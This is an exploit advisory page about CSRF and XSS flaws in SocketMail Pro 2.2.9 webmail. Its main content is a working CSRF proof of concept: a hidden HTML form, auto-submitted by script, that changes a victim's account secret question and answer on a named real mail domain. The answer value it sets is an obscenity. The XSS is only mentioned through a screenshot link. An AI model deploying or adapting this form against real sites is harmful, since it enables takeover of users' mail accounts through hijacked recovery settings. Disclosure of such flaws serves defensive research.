SocketMail Pro 2.2.9 Cross Site Request Forgery / Cross Site Scripting

2012.04.24
Credit: MetaiZm
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

#Title:SocketMail Pro version 2.2.9 CSRF (Cross Site Request Forgery) && XSS (Cross Site Scripting) #Author:MetaiZm #Software:SocketMail Pro version 2.2.9 #Website:http://socketmail.com/ #Tested on:Windows XP SP3 # Description : Subject xss codes inject and email send -> Screen : http://s019.radikal.ru/i627/1204/e2/0ce8a6b54b52.jpg (XSS) # Author:B0T_25 Cross Site Request Forgery Change to Secret question <- # PoC: http://pastebin.com/diSCcMXM (CSRF) <form action="http://mail.hayastan.am/home/secretqtn.php" method=post name="signup"> <input type=hidden name='action' value='upd'> <input type=text name="user_secret_qtn" size="30" maxlength="50" value="hayastan?"> <input type=text name="user_secret_answer" size="30" maxlength="50" value="sikdimseni"> <input type="submit" value="gonder"/> </form> <script language="javascript"> document.forms[0].submit() </script>

References:

http://socketmail.com/


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top